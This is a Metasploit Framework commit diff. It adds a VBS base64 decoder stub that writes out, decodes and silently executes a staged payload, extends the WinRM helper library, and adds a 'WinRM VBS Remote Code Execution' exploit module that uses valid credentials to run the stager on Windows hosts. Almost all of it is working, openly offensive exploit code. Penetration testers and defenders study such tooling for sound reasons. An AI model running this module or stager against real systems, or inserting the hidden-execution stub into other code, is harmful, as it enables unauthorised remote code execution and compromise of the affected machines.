Adds temp vbs mod and tweaked decoder stub

David Maloney · David Maloney · commit c30ada5eac3a · 2012-11-04T12:49:15.000-06:00
diff --git a/data/exploits/cmdstager/vbs_b64_sleep b/data/exploits/cmdstager/vbs_b64_sleep
@@ -0,0 +1,41 @@
+echo Set fs = CreateObject("Scripting.FileSystemObject") >>decode_stub
+echo Set file = fs.GetFile("ENCODED") >>decode_stub
+echo If file.Size Then >>decode_stub
+echo Set fd = fs.OpenTextFile("ENCODED", 1) >>decode_stub
+echo data = fd.ReadAll >>decode_stub
+echo data = Replace(data, vbCrLf, "") >>decode_stub
+echo data = base64_decode(data) >>decode_stub
+echo fd.Close >>decode_stub
+echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile("DECODED", 2, True) >>decode_stub
+echo ofs.Write data >>decode_stub
+echo ofs.close >>decode_stub
+echo Set shell = CreateObject("Wscript.Shell") >>decode_stub
+echo shell.run "DECODED", 0, false >>decode_stub
+echo Wscript.sleep(1000 * 60 * 5) >>decode_stub
+echo Else >>decode_stub
+echo Wscript.Echo "The file is empty." >>decode_stub
+echo End If >>decode_stub
+echo Function base64_decode(byVal strIn) >>decode_stub
+echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
+echo For n = 1 To Len(strIn) Step 4 >>decode_stub
+echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
+echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
+echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
+echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
+echo If Not w2 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
+echo If  Not w3 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
+echo If Not w4 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
+echo Next >>decode_stub
+echo base64_decode = strOut >>decode_stub
+echo End Function >>decode_stub
+echo Function mimedecode(byVal strIn) >>decode_stub
+echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>decode_stub
+echo If Len(strIn) = 0 Then >>decode_stub
+echo mimedecode = -1 : Exit Function >>decode_stub
+echo Else >>decode_stub
+echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
+echo End If >>decode_stub
+echo End Function >>decode_stub
diff --git a/lib/msf/core/exploit/winrm.rb b/lib/msf/core/exploit/winrm.rb
@@ -62,6 +62,10 @@ def parse_auth_methods(resp)
 
 	def winrm_run_cmd(cmd, timeout=20)
 		resp,c = send_request_ntlm(winrm_open_shell_msg,timeout)
+		if resp.nil?
+			print_error "Recieved no reply from server"
+			return nil
+		end
 		if resp.code == 401
 			print_error "Login failure! Recheck supplied credentials."
 			return resp .code
@@ -81,6 +85,29 @@ def winrm_run_cmd(cmd, timeout=20)
 		return streams
 	end
 
+	def winrm_run_cmd_hanging(cmd, timeout=20)
+		resp,c = send_request_ntlm(winrm_open_shell_msg,timeout)
+		if resp.nil?
+			print_error "Recieved no reply from server"
+			return nil
+		end
+		if resp.code == 401
+			print_error "Login failure! Recheck supplied credentials."
+			return resp .code
+		end
+		unless resp.code == 200
+			print_error "Got unexpected response: \n #{resp.to_s}"
+			retval = resp.code || 0
+			return retval
+		end
+		shell_id = winrm_get_shell_id(resp)
+		resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id),timeout)
+		cmd_id = winrm_get_cmd_id(resp)
+		resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id),timeout)
+		streams = winrm_get_cmd_streams(resp)
+		return streams
+	end
+
 	def winrm_wql_msg(wql)
 		action = winrm_uri_action("wql")
 		contents = winrm_header(action) + winrm_wql_body(wql)
@@ -292,6 +319,7 @@ def target_url
 		end
 	end
 
+
 	private
 
 	def winrm_option_set(options)
diff --git a/modules/exploits/windows/winrm/winrm_vbsl.rb b/modules/exploits/windows/winrm/winrm_vbsl.rb
@@ -0,0 +1,86 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ManualRanking
+
+	include Msf::Exploit::Remote::WinRM
+	include Msf::Exploit::CmdStagerVBS
+
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'WinRM VBS Remote Code Execution',
+			'Description'    => %q{
+					This module uses valid credentials to login to the WinRM service
+					and execute a VBS cmdstager.
+			},
+			'Author'         => [ 'thelightcosine' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'Privileged'     => true,
+			'DefaultOptions' =>
+				{
+					'WfsDelay'     => 30,
+					'EXITFUNC' => 'thread',
+					'InitialAutoRunScript' => 'post/windows/manage/smart_migrate',
+				},
+			'Platform'       => 'win',
+			'Arch'          => [ ARCH_X86, ARCH_X86_64 ],
+			'Targets'        =>
+				[
+					[ 'Windows', { } ],
+				],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Nov 01 2012'
+		))
+
+		register_advanced_options(
+		[
+			OptString.new( 'DECODERSTUB',  [ true, 'The VBS base64 file decoder stub to use.',
+				File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_sleep")]),
+		], self.class)
+
+	end
+
+	def check
+		unless accepts_ntlm_auth
+			print_error "The Remote WinRM  server  does not appear to allow Negotiate(NTLM) auth"
+			return Msf::Exploit::CheckCode::Safe
+		end
+	end
+
+
+	def exploit
+		execute_cmdstager
+		handler
+	end
+
+	def execute_command(cmd,opts)
+		commands = cmd.split(/&/)
+		commands.each do |command|
+			if command.include? "cscript"
+				streams = winrm_run_cmd_hanging(command)
+				print_status streams.inspect
+			elsif command.include? "del %TEMP%"
+				next
+			else
+				winrm_run_cmd(command)
+			end
+		end
+	end
+
+
+end
